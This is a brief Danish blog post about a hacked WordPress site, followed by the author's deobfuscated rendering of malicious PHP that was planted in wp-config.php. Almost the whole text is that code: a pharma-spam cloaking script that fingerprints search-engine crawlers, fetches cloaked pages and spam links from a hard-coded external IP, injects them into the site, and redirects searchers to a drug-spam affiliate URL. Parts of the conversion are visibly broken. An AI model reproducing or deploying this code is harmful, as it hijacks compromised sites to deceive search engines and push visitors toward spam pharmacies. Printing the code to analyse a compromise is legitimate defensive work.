Jon er blevet hacket
Jon Lunds WordPress site var blevet hacket, og noget ondsindet kode var blevet tilføjet wp-config.php. Den originale kildetekst var obfuskeret, men jeg har her forsøgt at konvertere den til noget læsbart.
@error_reporting(0); $victim = 'jon-lund'; $spam_target_url = 'http://212.95.54.63/sutra/in.cgi?default&seoref=' . rawurlencode($_SERVER['HTTP_REFERER']) . '¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=' . rawurlencode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']) . '&default_keyword=pharmacy&said=' . rawurlencode($victim); $spam_base_url = 'http://212.95.54.63/dors/' . $victim . '/'; $spam_links_url = 'http://212.95.54.63/dors/' . $victim . '/!spam_links.txt'; $url_keys = array(); $spam_terms = array('viagra', 'cialis', 'levitra', 'propecia', 'xenical', 'acomplia', 'soma', 'tramadol', 'ultram', 'valium', 'xanax', 'ativan', 'ambien', 'phentermine', 'prednisone', 'zovirax', 'singulair', 'zithomax', 'antabuse', 'pharmacy', 'canadian', 'prescription', 'pills', 'carisprodol', 'adipex', 'accutane', 'doxycycline', 'synthroid', 'celexa', 'levaquin', 'topamax', 'clomid', 'kamagra', 'lasix', 'amoxil', 'nexium', 'rimonabant', 'tadacip', 'nolvadex', 'zoloft'); // Is the referring page a search engine result page for a search for a spam term? function is_serp() { global $spam_terms; if (preg_match('!google|msn|live|altavista|ask|yaho o|aol|cnn|weather|alexa!i', $_SERVER['HTTP_REFERER'])) { preg_match('![\?\&]q=([^&]+)|[\?\&]query=([^&]+)|[\?\&]p=([^&]+)|[\?\&]keywords=([^&]+)!i', $_SERVER['HTTP_REFERER'], $matches); foreach ($matches as $query) { if (!empty($query)) { $query = $_19; break; } } if (!empty($query)) { foreach ($spam_terms as $term) { if (strpos(strtolower($query), strtolower($term)) !== false) { return true; } } } } return false; } $bot_ip_patterns = array('8\.6\.48\.[0-9]+', '64\.9\.22[4-9]\.[0-9]+', '64\.9\.2[3-5][0-9]\.[0-9]+', '64\.68\.8[0-9]\.[0-9]+', '64\.68\.9[0-2]\.[0-9]+', '64\.68\.8[8-9]\.[0-9]+', '64\.68\.9[0-5]\.[0-9]+', '64\.208\.32\.[4-9]', '64\.208\.32\.[0-9][0-9]+', '64\.208\.3[2-6].[0-9]+', '64\.208\.37\.[0-9]', '64\.208\.37\.[0-9][0-9]', '64\.208\.37\.1[0-6][0-8]', '64\.233\.1[6-8][0-9]\.[0-9]+', '64\.233\.19[0-1]\.[0-9]+', '66\.249\.6[4-9]\.[0-9]+', '66\.249\.[7-8][0-9]\.[0-9]+', '66\.249\.9[0-5]\.[0-9]+', '66\.249\.[6-9][0-9]\.[0-9]+', '72\.14\.19[2-9]\.[0-9]+', '72\.14\.2[0-9][0-9]\.[0-9]+', '74\.125\.[0-9]+\.[0-9]+', '209\.85.12[8-9].[0-9]+', '209\.85.1[3-9][0-9].[0-9]+', '209\.85.2[0-9][0-9].[0-9]+', '209\.185\.108\.[0-9]+', '209\.185\.253\.[0-9]+', '216\.33\.229\.16[0-7]', '216\.239\.3[2-9]\.[0-9]+', '216\.239\.[4-5][0-9]\.[0-9]+', '216\.239\.6[1-3]\.[0-9]+', '65\.5[2-5]\.[0-9]+\.[0-9]+', '131\.107\.[0-9]+\.[0-9]+', '207\.46\.[0-9]+\.[0-9]+', '209\.240\.19[2-9]\.[0-9]+', '209\.240\.2[0-1][0-9]\.[0-9]+', '209\.240\.22[0-3]\.[0-9]+', '213\.199\.12[8-9]\.[0-9]+', '213\.199\.13[0-9]\.[0-9]+', '213\.199\.14[0-3]\.[0-9]+', '216\.220\.20[8-9]\.[0-9]+', '216\.220\.21[0-9]\.[0-9]+', '216\.220\.22[0-3]\.[0-9]+', '8\.12\.144\.[0-255]', '8\.12\.147\.[0-255]', '64\.157\.4\.76', '64\.157\.4\.10[4-5]', '67\.195\.[0-9]+\.[0-9]+', '72\.30\.[0-9]+\.[0-9]+', '74\.6\.[0-9]+\.[0-9]+', '209\.131\.3[2-9]\.[0-9]+', '209\.131\.[4-5][0-9]\.[0-9]+', '209\.131\.6[1-3]\.[0-9]+', '216.145.4[8-9]\.[0-9]+', '216.145.5[0-9]\.[0-9]+', '216.145.6[1-3]\.[0-9]+', '217\.12\.[7-9]\.[0-9]+', '217\.12\.1[0-5]\.[0-9]+', '62\.149\.140\.132\.[0-9]+', '63\.83\.186\.[0-9]+', '64\.209\.181\.[0-9]+', '64\.111\.206\.170\.[0-9]+', '66\.39\.65\.63\.[0-9]+', '66\.40\.34\.248\.[0-9]+', '82\.146\.52\.158\.[0-9]+', '198\.247\.172\.1\.[0-9]+', '198\.247\.172\.2\.[0-9]+', '198\.247\.172\.3\.[0-9]+', '198\.247\.172\.4\.[0-9]+', '198\.247\.172\.5\.[0-9]+', '198\.247\.172\.6\.[0-9]+', '198\.247\.172\.8\.[0-9]+', '198\.247\.172\.9\.[0-9]+', '198\.247\.172\.10\.[0-9]+', '216\.198\.200\.[0-9]+', '216\.239\.193\.[0-9]+', '38\.[0-9]+\.[0-9]+\.[0-9]+', '62\.172\.199\.[0-9]+', '141\.185\.209\.[0-9]+', '169\.207\.238\.[0-9]+', '199\.177\.18\.[0-9]+', '203\.255\.234\.[0-9]+', '216\.32\.237\.[0-9]+', '216\.32\.237\.[0-9]+', '216\.32\.237\.[0-9 ]+', '216\.32\.237\.[0-9]+', '216\.32\.237\.[0-9]+', '93\.172\.94\.227', '212\.100\.250\.218', '71\.165\.223\.134', '24\.200\.208\.112', '64\.69\.34\.134', '65\.33\.87\.94', '65\.93\.62\.242', '66\.230\.175\.124', '66\.255\.53\.123', '67\.162\.158\.146', '67\.210\.111\.241', '69\.136\.208\.89', '70\.50\.189\.191', '70\.91\.180\.25', '74\.86\.143\.90', '74\.193\.246\.129', '78\.166\.111\.63', '78\.180\.145\.80', '81\.135\.175\.70', '83\.15\.211\.166', '89\.122\.224\.230', '89\.149\.217\.191', '89\.149\.253\.169', '118\.124\.32\.193', '123\.30\.6\.3', '129\.187\.148\.240', '129\.187\.148\.244', '165\.160\.2\.20', '194\.44\.241\.154', '195\.92\.229\.2', '199\.126\.151\.229', '207\.211\.40\.82', '218\.18\.174\.27', '218\.28\.88\.99', '213\.144\.15\.38', '62\.27\.59\.[0-9]+', '63\.163\.102\.[0-9]+', '64\.157\.137\.[0-9]+', '64\.157\.138\.[0-9]+', '64\.75\.36\.[0-9]+', '66\.163\.170\.[0-9]+', '66\.163\.174\.[0-9]+', '66\.196\.101\.[0-9]+', '66\.196\.65\.[0-9]+', '66\.196\.67\.[0-9]+', '66\.196\.72\.[0-9]+', '66\.196\.73\.[0-9]+', '66\.196\.74\.[0-9]+', '66\.196\.77\.[0-9]+', '66\.196\.78\.[0-9]+', '66\.196\.80\.[0-9]+', '66\.196\.81\.[0-9]+', '66\.196\.90\.[0-9]+', '66\.196\.91\.[0-9]+', '66\.196\.92\.[0-9]+', '66\.196\.93\.[0-9]+', '66\.196\.97\.[0-9]+', '66\.196\.99\.[0-9]+', '66\.218\.65\.[0-9]+', '66\.218\.70\.[0-9]+', '66\.228\.164\.[0-9]+', '66\.228\.165\.[0-9]+', '66\.228\.166\.[0-9]+', '66\.228\.173\.[0-9]+', '66\.228\.182\.[0-9]+', '66\.94\.230\.[0-9]+', '66\.94\.232\.[0-9]+', '66\.94\.233\.[0-9]+', '66\.94\.238\.[0-9]+', '68\.142\.195\.[0-9]+', '68\.142\.203\.[0-9]+', '68\.142\.211\.[0-9]+', '68\.142\.212\.[0-9]+', '68\.142\.230\.[0-9]+', '68\.142\.231\.[0-9]+', '68\.142\.240\.[0-9]+', '68\.142\.246\.[0-9]+', '68\.142\.249\.[0-9]+', '68\.142\.250\.[0-9]+', '68\.142\.251\.[0-9]+', '68\.180\.216\.[0-9]+', '68\.180\.250\.[0-9]+', '68\.180\.251\.[0-9]+', '69\.147\.79\.[0-9]+', '74\.55\.27\.[0-9]+', '202\.160\.178\.[0-9]+', '202\.160\.179\.[0-9]+', '202\.160\.180\.[0-9]+', '202\.160\.181\.[0-9]+', '202\.160\.183\.[0-9]+', '202\.160\.185\.[0-9]+', '202\.165\.96\.[0-9]+', '202\.165\.98\.[0-9]+', '202\.165\.99\.[0-9]+', '202\.212\.5\.[0-9]+', '202\.46\.19\.[0-9]+', '203\.123\.188\.[0-9]+', '203\.141\.52\.[0-9]+', '206\.190\.43\.[0-9]+', '207\.126\.239\.[0-9]+', '209\.1\.12\.[0-9]+', '209\.1\.13\.[0-9]+', '209\.1\.32\.[0-9]+', '209\.1\.38\.[0-9]+', '209\.131\.60\.[0-9]+', '209\.185\.122\.[0-9]+', '209\.185\.141\.[0-9]+', '209\.185\.143\.[0-9]+', '209\.191\.123\.[0-9]+', '209\.191\.64\.[0-9]+', '209\.191\.65\.[0-9]+', '209\.191\.82\.[0-9]+', '209\.191\.83\.[0-9]+', '209\.67\.206\.[0-9]+', '209\.73\.176\.[0-9]+', '211\.14\.8\.[0-9]+', '211\.169\.241\.[0-9]+', '213\.216\.143\.[0-9]+', '216\.109\.121\.[0-9]+', '216\.109\.126\.[0-9]+', '216\.136\.233\.[0-9]+', '216\.155\.198\.[0-9]+', '216\.155\.200\.[0-9]+', '216\.155\.202\.[0-9]+', '216\.155\.204\.[0-9]+', '216\.33\.229\.[0-9]+', '174\.129\.130\.[0-9]+', '174\.129\.66\.[0-9]+'); $this_url = 'http://' .$_SERVER['HTTP_HOST'] .$_SERVER['REQUEST_URI']; $status = array(); $show_debug = stristr($_SERVER['HTTP_USER_AGENT'], 12345); $status[] = 'start'; class bot_detector { var $bot_user_agents = array('google', 'altavista', 'bing', 'yahoo', 'http', 'jeeves', 'msnbot', 'bot', 'crawl', 'spider', 'robot', 'HttpClient', 'curl', 'PHP', 'Indy Library', 'WordPress', 'charlotte', 'wwwster', 'Python', 'urllib', 'perl', 'libwww', 'lynx', 'Twiceler', 'rambler', 'yandex', 'ngb', 'slurp', 'gulliver', 'robozill', 'ultraseek', 'infoseek', 'ask', 'webalta', 'pear', 'teleport', 'ask', 'worm', 'Speedy', 'scanner', 'scooter', 'lwp', 'HTTrack', 'Accoona', 'CFNetwork', 'wget'); function is_bot() { if ($this->is_bot_ip()) { return true; } if ($this->is_seach_engine_user_agent()) { return true; } return false; } function is_seach_engine_user_agent() { foreach ($this->bot_user_agents as $user_agent) { if (stristr($_SERVER['HTTP_USER_AGENT'], $user_agent)) { return true; } } return false; } function is_bot_ip() { global $bot_ip_patterns; foreach ($bot_ip_patterns as $pattern) { if (eregi($pattern, $_SERVER['REMOTE_ADDR'])) { return true; } } return false; } } class serp_detector { // Is the referring page a search engine result page for a search for a spam term? function is_serp() { global $spam_terms; if (preg_match('#google|msn|live|altavista|ask|yahoo|aol|bing#i',$_SERVER['HTTP_REFERER'])) { if (preg_match('#[\?\&](q|p|query|keywords)=([^&]+)#i', $_SERVER['HTTP_REFERER'], $matches)){ $query = isset($matches[2]) ? $matches[2] : null; if (!empty($query)) { foreach ($spam_terms as $term) { if (stristr($query, $term)!==false) { $this->term = $term; return true; } } } } } return false; } } class http_client { var $client = 'none'; function http_client() { if (ini_get('allow_url_fopen')) { $this->client = 'fgc'; } elseif (function_exists(curl_init)) { $this->client = 'curl'; } } function fetch($url) { if ($this->client== 'none') return false; $data = @file_get_contents($url); if ($this->client == 'curl') { $ch = curl_init($url); curl_setopt($ch, CURLOPT_TIMEOUT, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $data = curl_exec($ch); curl_close($ch); } $data = trim($result); if ($data == '404') { $result = false; } if ($data == '302') { $result = false; } if (strlen($data) < 200) { $result = false; } if (strpos($data, '212.95.54.63/dors/404.html') >= 1) { $result = false; } return array( 'success' => (bool)$data, 'html' => $data, 'remote' => $url, 'client' => $this->client); } function get_checksum($url) { return md5(str_replace(array('http://', 'https://', 'www.', 'index.php', '/'), '', strtolower($url))); } } function http_fetch($url) { if (ini_get('allow_url_fopen')) { return file_get_contents($url); } elseif (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 10); return curl_exec($ch); } } function fetch_spam_links() { global $spam_links_url; $data = http_fetch($spam_links_url); $lines = preg_split('/[\r\n]+/', $data); return implode(array_slice($lines, 1, rand(5, 10))); } function generate_url_keys(){ global $url_keys; $url_key = 'http://' .$_SERVER['SERVER_NAME'] . 'main/page-'; $url_key = str_replace('http://', '',$url_key); $url_key = str_replace('https://', '',$url_key); $url_key = str_replace('www.', '',$url_key); $url_key = str_replace('/index.php', '',$url_key); $url_key = str_replace('/', '',$url_key); for ($i = 100; $i <= 900; $i++) { array_push($url_keys, trim($url_key . $i)); } } $bot_detector = new bot_detector(); $serp_detector = new serp_detector(); $exit = false; if ($serp_detector->is_bot() || (isset($_GET['idioma']) && !$serp_detector->is_serp())) { $status[] = "bot detected. try load cloack for page $this_url"; $http_client = new http_client($spam_base_url); $checksum = $http_client->get_checksum($this_url); $url = $spam_base_url . $checksum . '.html'; $result = $http_client->fetch($url); $status[] = 'client: ' . $result['client']; $status[] = 'remote url: ' . $result['remote']; if ($result['success']) { $status[] = 'cloack page was loaded'; if (!$show_debug) { if (strlen($result['html']) > 200) { echo $result['html']; $exit = true; } } } else { $status[] = 'cloack page was NOT loaded'; if (!isset($_GET['show_nolinks']) && !$show_debug) { $spam_links = fetch_spam_links(); $url = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . '?' .$_SERVER['QUERY_STRING'] . '&show_nolinks=1'; $html = http_fetch($url); if (!empty($html)) { if (strlen($html) > 200) { echo str_replace('</body>', $spam_links .'</body>', $html); } $exit = true; } else { $exit = false; } } } } else { $status[] = 'bot NOT detected'; if ($serp_detector->is_serp()) { $status[] = "serp user detected with key: $serp_detector->term"; if ($show_debug) { header('Location: ' . $spam_target_url); } else { $status[] = "redirect to $spam_target_url"; } $exit = true; } else { if (is_serp()) { print '<html><head><title>Loading</title></head><body> <script> function wat(sutra,defkey,said){ window.location=(sutra+"&seoref="+encodeURIComponent(document.referrer)+ "¶meter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword="+defkey+"&said="+said); } wat("http://212.95.54.63/sutra/in.cgi?default","",""); </script> </body></html>'; exit(); } $status[] = 'serp user NOT detected'; $status[] = 'checking virtual folder'; generate_url_keys(); $url_key = 'http://' .$_SERVER['SERVER_NAME'] .$_SERVER['REQUEST_URI']; $url_key = str_replace('http://', '' ,$url_key); $url_key = str_replace('https://', '', $url_key); $url_key = str_replace('www.', '', $url_key); $url_key = str_replace('/index.php', '', $url_key); $url_key = str_replace('/', '', $url_key); if (in_array($url_key, $url_keys)) { $status[] = 'virtual folder finded'; $status[] = 'redirect'; print '<html><head><title>Loading</title></head><body> <script> function wat(sutra,defkey,said) { window.location=(sutra+"&seoref="+encodeURIComponent(document.referrer)+ "¶meter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword="+defkey+"&said="+said); } wat("http://212.95.54.63/sutra/in.cgi?default", "", "' . $victim . '""); </script> </body></html>'; exit(); } } } if ($show_debug) { if ($exit) { $status[] = 'exit'; } else { $status[] = 'show site'; } die(nl2br(join("\n", $status))); } if ($exit) { die(); }